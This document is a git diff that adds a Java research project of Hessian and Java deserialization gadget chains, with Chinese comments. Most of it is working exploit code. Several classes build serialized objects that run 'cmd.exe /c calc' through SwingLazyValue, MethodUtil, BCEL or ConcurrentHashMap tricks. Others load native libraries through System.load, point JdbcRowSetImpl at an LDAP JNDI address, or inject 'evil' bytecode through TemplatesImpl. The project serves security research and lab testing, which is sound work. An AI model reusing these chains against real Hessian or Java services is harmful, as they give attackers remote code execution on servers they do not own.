ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + // 不知道为什么要包一层 +// Object simple = UnsafeTools.getObjectByUnsafe(AbstractMap.SimpleEntry.class); + // 这里的key 是 final private，但是竟然能直接赋值成功 +// ReflectTools.setFieldValue(simple, "key", jsonArray); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + // 键值不能改，确保hashCode碰撞，才能进入equals + hashMap1.put("zZ", xString); + hashMap1.put("yy", jsonArray); + hashMap2.put("yy", xString); + hashMap2.put("zZ", jsonArray); + + HashMap finalMap = ReflectTools.makeMap(hashMap1, hashMap2); + + return finalMap; + } + + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } +} diff --git a/hessian/src/main/java/com/test/gadget/c3p0.java b/hessian/src/main/java/com/test/gadget/c3p0.java new file mode 100644 index 0000000..6042d8f --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/c3p0.java @@ -0,0 +1,4 @@ +package com.test.gadget; + +public class c3p0 { +} diff --git a/hessian/src/main/java/com/test/gadget/tmp.java b/hessian/src/main/java/com/test/gadget/tmp.java new file mode 100644 index 0000000..d37b3af --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp.java @@ -0,0 +1,156 @@ +package com.test.gadget; + +import com.alibaba.fastjson.JSONObject; +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; + +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import sun.reflect.ReflectionFactory; + +import java.io.*; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Random; +import java.util.concurrent.ConcurrentHashMap; + +import static com.sun.org.apache.xalan.internal.xsltc.compiler.Constants.CHARACTERS; + +public class tmp { + public static void main(String[] args) throws Exception { + ServerManagerImpl serverManager = createWithObjectNoArgsConstructor(ServerManagerImpl.class); + HashMap map =new HashMap<>(); + ServerTableEntry serverTableEntry = createWithObjectNoArgsConstructor(ServerTableEntry.class); + map.put(1,serverTableEntry); + + Process process = new ProcessBuilder("cmd", "/c", "calc").start(); + + setFieldValue(serverManager, "serverTable", map); + setFieldValue(serverTableEntry,"state",2); + setFieldValue(serverTableEntry, "process", process); + setFieldValue(serverTableEntry, "activationCmd", "calc"); + + JSONObject jsonObject = new JSONObject(); + jsonObject.put("key", serverManager); + + +// XStringForFSB xStringForFSB = createWithoutConstructor(XStringForFSB.class); +// setFieldValue(xStringForFSB, "m_strCache", generateRandomString()); + Object conEntry = createWithObjectNoArgsConstructor(Class.forName("javax.sound.sampled.AudioFileFormat$Type")); + + + Object conEntry1 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + Object conEntry2 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + setFieldValue(conEntry1, "key", conEntry); + setFieldValue(conEntry1, "val", jsonObject); + setFieldValue(conEntry2, "key", jsonObject); + setFieldValue(conEntry2, "val", conEntry); + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + setAccessible(nodeCons); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, conEntry1, conEntry1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, conEntry2, conEntry2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + Hessian2Output out = new Hessian2Output(byteArrayOutputStream); + + SerializerFactory sf = new SerializerFactory(); + sf.setAllowNonSerializable(true); + out.setSerializerFactory(sf); + out.writeObject(s); + out.flush(); + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray()); + new Hessian2Input(byteArrayInputStream).readObject(); + } + + public static void Serialize(Object obj) throws IOException { + ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin")); + objectOutputStream.writeObject(obj); + + } + + public static Object Unserialize(String Filename) throws IOException,ClassNotFoundException{ + + ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); + Object obj = objectInputStream.readObject(); + return obj; + + } + public static String generateRandomString() { + Random random = new Random(); + int length = random.nextInt(20)+1; + StringBuilder sb = new StringBuilder(length); + + for (int i = 0; i < length; i++) { + int index = random.nextInt(CHARACTERS.length()); + char randomChar = CHARACTERS.charAt(index); + sb.append(randomChar); + } + + return sb.toString(); + } + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + public static T createWithoutConstructor ( Class classToInstantiate ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + public static T createWithObjectNoArgsConstructor(Class clzToInstantiate) { + + T resObject = null; + try{ + resObject = createWithConstructor(clzToInstantiate, Object.class, new Class[0], new Object[0]); + } catch (NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) { + } + + return resObject; + } + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + public static void setAccessible(AccessibleObject member) { + String versionStr = System.getProperty("java.version"); + int javaVersion = Integer.parseInt(versionStr.split("\\.")[0]); + + // not possible to quiet runtime warnings anymore... + // see https://bugs.openjdk.java.net/browse/JDK-8210522 + // to understand impact on Permit (i.e. it does not work + // anymore with Java >= 12) + member.setAccessible(true); + } +} + diff --git a/hessian/src/main/java/com/test/gadget/tmp1.java b/hessian/src/main/java/com/test/gadget/tmp1.java new file mode 100644 index 0000000..a905790 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp1.java @@ -0,0 +1,27 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import tools.ReflectTools; + +import java.util.HashMap; + +public class tmp1 { + public static void main(String[] args) throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/2d4ade"); + EqualsBean equalsBean = new EqualsBean(JdbcRowSetImpl.class, jdbcRowSet); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", equalsBean); + hashMap1.put("yy", jdbcRowSet); + hashMap2.put("zZ", jdbcRowSet); + hashMap2.put("yy", equalsBean); + + HashMap finalMap = ReflectTools.makeMap(hashMap2, hashMap1); + + byte[] bytes = ReflectTools.ser2bytes(finalMap); + ReflectTools.deser(bytes, null); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java new file mode 100644 index 0000000..ad4a5a8 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java @@ -0,0 +1,10 @@ +package com.test.gadget.toStringBased; + +import java.io.IOException; + +public class BCELClass { + public static void _main(String[] args) throws IOException { + System.out.println("evil _main"); + Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "calc"}); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java new file mode 100644 index 0000000..17436b0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java @@ -0,0 +1,37 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.swing.*; +import java.lang.reflect.Method; +import java.rmi.server.UID; +import java.util.HashMap; + +public class HashTableEquals_get { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime，会找不到方法，因为要求参数类型为Object + // hessian>=60最终不能调Runtime，因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + UIDefaults uiDefaults1 = new UIDefaults(); + uiDefaults1.put("1diot9", swingLazyValue); + + HashMap hashMap = ReflectTools.makeMap(uiDefaults, uiDefaults1); + + return hashMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java new file mode 100644 index 0000000..0702e2d --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java @@ -0,0 +1,36 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; +import java.io.IOException; +import java.lang.reflect.Method; + +public class MimeTypeParameterList_MethodUtil { + public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, IOException, ClassNotFoundException { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + + public static Object getPayload() throws NoSuchMethodException, IllegalAccessException, ClassNotFoundException { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime，会找不到方法，因为要求参数类型为Object + // hessian>=60最终不能调Runtime，因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java new file mode 100644 index 0000000..16be253 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java @@ -0,0 +1,57 @@ +package com.test.gadget.toStringBased; + +import jdk.nashorn.internal.runtime.ScriptEnvironment; +import jdk.nashorn.internal.runtime.logging.DebugLogger; +import tools.HessianTools; +import tools.IOTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; + +public class MimeTypeParameterList_ProxyLazyValue_Sysload { + public static void main(String[] args) throws Exception { +// Object payload = writeFilePayload(); +// byte[] bytes = HessianTools.hessian2ToStringSer(payload); +// HessianTools.hessian2Deser(bytes); + + Object o = sysLoadPayload(); + byte[] bytes1 = HessianTools.hessian2ToStringSer(o); + HessianTools.hessian2Deser(bytes1); + } + + public static Object writeFilePayload() throws Exception { + Object scriptenv = UnsafeTools.getObjectByUnsafe(ScriptEnvironment.class); + ReflectTools.setFieldValue(scriptenv, "_print_code", false); + ReflectTools.setFieldValue(scriptenv, "_dest_dir", "D:/"); + + Object debug = UnsafeTools.getObjectByUnsafe(DebugLogger.class); + byte[] bytes = IOTools.readFile("D:/1tmp/gcc/dynamic.dll"); + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("jdk.nashorn.internal.codegen.DumpBytecode", "dumpBytecode", new Object[]{scriptenv, debug, bytes, "test"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } + + public static Object sysLoadPayload() throws Exception { + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("java.lang.System", "load", new Object[]{"D:/test.class"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java new file mode 100644 index 0000000..726abfd --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java @@ -0,0 +1,38 @@ +package com.test.gadget.toStringBased; + +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.util.ClassPath; +import sun.security.pkcs.PKCS9Attribute; +import sun.security.pkcs.PKCS9Attributes; +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.swing.*; +import java.io.IOException; + +public class PKCS9_BCEL { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + JavaClass javaClass = Repository.lookupClass(BCELClass.class); + String bcel = "$$BCEL$$" + Utility.encode(javaClass.getBytes(), true); + + SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{bcel}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, swingLazyValue); + + Object PKCS9s = UnsafeTools.getObjectByUnsafe(PKCS9Attributes.class); + ReflectTools.setFieldValue(PKCS9s, "attributes", uiDefaults); + + return PKCS9s; + } +} diff --git a/hessian/src/main/java/com/test/pojo/Person.java b/hessian/src/main/java/com/test/pojo/Person.java new file mode 100644 index 0000000..1f1a6e8 --- /dev/null +++ b/hessian/src/main/java/com/test/pojo/Person.java @@ -0,0 +1,29 @@ +package com.test.pojo; + +import java.io.Serializable; + +public class Person implements Serializable { + private int id; + private String name; + + public Person(int id, String name) { + this.id = id; + this.name = name; + } + + public int getId() { + return id; + } + + public void setId(int id) { + this.id = id; + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } +} diff --git a/hessian/src/main/java/com/test/server/HessianServiceImpl.java b/hessian/src/main/java/com/test/server/HessianServiceImpl.java new file mode 100644 index 0000000..b439ee7 --- /dev/null +++ b/hessian/src/main/java/com/test/server/HessianServiceImpl.java @@ -0,0 +1,13 @@ +package com.test.server; + +import com.caucho.hessian.server.HessianServlet; + +import javax.servlet.annotation.WebServlet; + +@WebServlet(name = "hessian", value = "/hessian") +public class HessianServiceImpl extends HessianServlet implements Service { + @Override + public String getCurrentTime() { + return "test time: 1970/01/01"; + } +} diff --git a/hessian/src/main/java/com/test/server/Service.java b/hessian/src/main/java/com/test/server/Service.java new file mode 100644 index 0000000..59934b9 --- /dev/null +++ b/hessian/src/main/java/com/test/server/Service.java @@ -0,0 +1,5 @@ +package com.test.server; + +public interface Service { + public String getCurrentTime(); +} diff --git a/hessian/src/main/java/tools/ClassByteGen.java b/hessian/src/main/java/tools/ClassByteGen.java new file mode 100644 index 0000000..0a0f32a --- /dev/null +++ b/hessian/src/main/java/tools/ClassByteGen.java @@ -0,0 +1,29 @@ +package tools; + +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtConstructor; + +public class ClassByteGen { + public static byte[] getBytes(String code, String className) throws Exception { + String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"; + ClassPool pool = ClassPool.getDefault(); + pool.importPackage(Abstract); + pool.importPackage("java.io"); + pool.importPackage("java.nio.file"); + pool.importPackage("java.lang.reflect"); + pool.importPackage("java.nio.charset"); + pool.importPackage("java.util"); + pool.insertClassPath(Abstract); +// pool.insertClassPath("java.nio"); + CtClass ctClass = pool.makeClass(className); + ctClass.setSuperclass(pool.get(Abstract)); +// CtConstructor ctConstructor = ctClass.makeClassInitializer(); +// ctConstructor.setBody(code); + CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass); + ctConstructor1.setBody(code); + ctClass.addConstructor(ctConstructor1); + ctClass.writeFile("ClassByteGen"); + return ctClass.toBytecode(); + } +} diff --git a/hessian/src/main/java/tools/HessianTools.java b/hessian/src/main/java/tools/HessianTools.java new file mode 100644 index 0000000..2875d1c --- /dev/null +++ b/hessian/src/main/java/tools/HessianTools.java @@ -0,0 +1,66 @@ +package tools; + +import com.caucho.hessian.io.*; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; + +public class HessianTools { + public static byte[] hessian2ToStringSer(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + baos.write(67); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + + public static byte[] hessian2Ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output hessian2Output = new Hessian2Output(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessian2Output.setSerializerFactory(serializerFactory); + + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + public static Object hessian2Deser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + Hessian2Input hessian2Input = new Hessian2Input(bais); + Object o = hessian2Input.readObject(); + hessian2Input.close(); + return o; + } + + public static byte[] hessianSer2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + HessianOutput hessianOutput = new HessianOutput(baos); + + SerializerFactory serializerFactory = new SerializerFactory(); + serializerFactory.setAllowNonSerializable(true); + hessianOutput.setSerializerFactory(serializerFactory); + + hessianOutput.writeObject(obj); + hessianOutput.close(); + return baos.toByteArray(); + } + + public static Object hessianDeser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + HessianInput hessianInput = new HessianInput(bais); + Object o = hessianInput.readObject(); + hessianInput.close(); + return o; + } +} diff --git a/hessian/src/main/java/tools/IOTools.java b/hessian/src/main/java/tools/IOTools.java new file mode 100644 index 0000000..46d0567 --- /dev/null +++ b/hessian/src/main/java/tools/IOTools.java @@ -0,0 +1,12 @@ +package tools; + +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class IOTools { + public static byte[] readFile(String fileName) throws IOException { + byte[] bytes = Files.readAllBytes(Paths.get(fileName)); + return bytes; + } +} diff --git a/hessian/src/main/java/tools/InvocationHandlerImpl.java b/hessian/src/main/java/tools/InvocationHandlerImpl.java new file mode 100644 index 0000000..7c15d95 --- /dev/null +++ b/hessian/src/main/java/tools/InvocationHandlerImpl.java @@ -0,0 +1,19 @@ +package tools; + +import java.io.Serializable; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Method; + +// 动态代理，实现对象接口转化 +public class InvocationHandlerImpl implements InvocationHandler, Serializable { + private Object object; + + public InvocationHandlerImpl(Object obj) { + this.object = obj; + } + + @Override + public Object invoke(Object proxy, Method method, Object[] args) throws Throwable { + return null; + } +} diff --git a/hessian/src/main/java/tools/Payload.java b/hessian/src/main/java/tools/Payload.java new file mode 100644 index 0000000..5396724 --- /dev/null +++ b/hessian/src/main/java/tools/Payload.java @@ -0,0 +1,10 @@ +package tools; + +public abstract class Payload { +// public Templates getTemplates(byte[] byteCode, String bytePath) throws Exception { +// Templates templates = TemplatesGen.getTemplates(byteCode, bytePath); +// return templates; +// } + + public abstract String getPayload(byte[] byteCode, String bytePath) throws Exception; +} diff --git a/hessian/src/main/java/tools/ReflectTools.java b/hessian/src/main/java/tools/ReflectTools.java new file mode 100644 index 0000000..f8e30a9 --- /dev/null +++ b/hessian/src/main/java/tools/ReflectTools.java @@ -0,0 +1,200 @@ +package tools; + +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtField; + +import java.io.*; +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Modifier; +import java.util.Base64; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; + +public class ReflectTools { + public static void setFieldValue(Object obj, String fieldName, Object value) throws IllegalAccessException { + Class aClass = obj.getClass(); + Field field = null; + while (aClass != null){ + try { + field = aClass.getDeclaredField(fieldName); + break; + } catch (NoSuchFieldException e) { + aClass = aClass.getSuperclass(); + } + } + field.setAccessible(true); + field.set(obj, value); + } + + // 修改static final 字段 + public static void setFinalField(Object object, String fieldName, Object newValue) throws Exception { + // 获取指定类的 Class 对象 + Class clazz = object.getClass(); + + // 获取 private final 字段 + Field field = clazz.getDeclaredField(fieldName); + + // 使私有字段可以访问 + field.setAccessible(true); + + // 移除 final 修饰符 + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~java.lang.reflect.Modifier.FINAL); + + // 修改字段的值 + field.set(object, newValue); + } + + public static Object getFieldValue(Object obj, String fieldName) throws NoSuchFieldException, IllegalAccessException { + Class aClass = obj.getClass(); + + while (aClass != null){ + try{ + Field declaredField = aClass.getDeclaredField(fieldName); + declaredField.setAccessible(true); + return declaredField.get(obj); + }catch(NoSuchFieldException e){ + aClass = aClass.getSuperclass(); + } + } + return null; + } + + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + return s; + } + + // 制作hash冲突map，实现调用called.equals(param) + public static HashMap makeEqualMap(Object called, Object param) throws Exception { + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", called); + hashMap1.put("yy", param); + hashMap2.put("zZ", param); + hashMap2.put("yy", called); + + HashMap finalMap = makeMap(hashMap2, hashMap1); + + return finalMap; + } + + public static ConcurrentHashMap makeConcurrentMap (Object v1, Object v2 ) throws Exception { + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + return s; + } + + // 生成不继承Serializable接口的Class，防止因suid不一样报错 + public static Class makeClass(String className, String suid) throws ClassNotFoundException, CannotCompileException { + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass(className); + + if (suid != null) { + // 添加 serialVersionUID 字段并指定其值 + CtField serialVersionUIDField = new CtField(CtClass.longType, "serialVersionUID", ctClass); + serialVersionUIDField.setModifiers(Modifier.PRIVATE | Modifier.STATIC | Modifier.FINAL); // 设置为private static final + ctClass.addField(serialVersionUIDField, suid); // 设置 serialVersionUID 值为 1L + } + + Class aClass = ctClass.toClass(); + return aClass; + } + + // 用于在HashMap中制造hash碰撞，从而触发equals，用于XString系列的equals触发；有时会失败，如XBean链，原因未知 + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } + + + public static byte[] ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(obj); + return baos.toByteArray(); + } + + public static void ser2file(Object obj, String fileName) throws IOException { + FileOutputStream fos = new FileOutputStream(fileName); + ObjectOutputStream oos = new ObjectOutputStream(fos); + oos.writeObject(obj); + } + + public static Object deser(byte[] bytes, String base64) throws IOException, ClassNotFoundException { + if (bytes != null) { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + }else { + byte[] decode = Base64.getDecoder().decode(base64); + ByteArrayInputStream bais = new ByteArrayInputStream(decode); + ObjectInputStream ois = new ObjectInputStream(bais); + return ois.readObject(); + } + } + + +} diff --git a/hessian/src/main/java/tools/TemplatesGen.java b/hessian/src/main/java/tools/TemplatesGen.java new file mode 100644 index 0000000..ccf9bac --- /dev/null +++ b/hessian/src/main/java/tools/TemplatesGen.java @@ -0,0 +1,34 @@ +package tools; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import javassist.CannotCompileException; +import javassist.ClassPool; +import javassist.CtClass; + +import javax.xml.transform.Templates; +import java.io.IOException; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class TemplatesGen { + public static Templates getTemplates(byte[] byteCode, String bytePath) throws IOException, IllegalAccessException, CannotCompileException { + byte[] evilBytes; + if (byteCode != null) { + evilBytes = byteCode; + }else { + evilBytes = Files.readAllBytes(Paths.get(bytePath)); + } + TemplatesImpl templates = new TemplatesImpl(); + ClassPool pool = ClassPool.getDefault(); + CtClass ctClass = pool.makeClass("useless"); + byte[] useless = ctClass.toBytecode(); + ReflectTools.setFieldValue(templates, "_name", "1diot9"); + ReflectTools.setFieldValue(templates, "_class", null); +// ReflectTools.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + ReflectTools.setFieldValue(templates, "_transletIndex", 0); + // 修改bytecodes数量和transletIndex，这样就不用继承AbstractTranslet + ReflectTools.setFieldValue(templates, "_bytecodes", new byte[][]{evilBytes, useless}); + return templates; + } + +} diff --git a/hessian/src/main/java/tools/UnsafeTools.java b/hessian/src/main/java/tools/UnsafeTools.java new file mode 100644 index 0000000..6579cca --- /dev/null +++ b/hessian/src/main/java/tools/UnsafeTools.java @@ -0,0 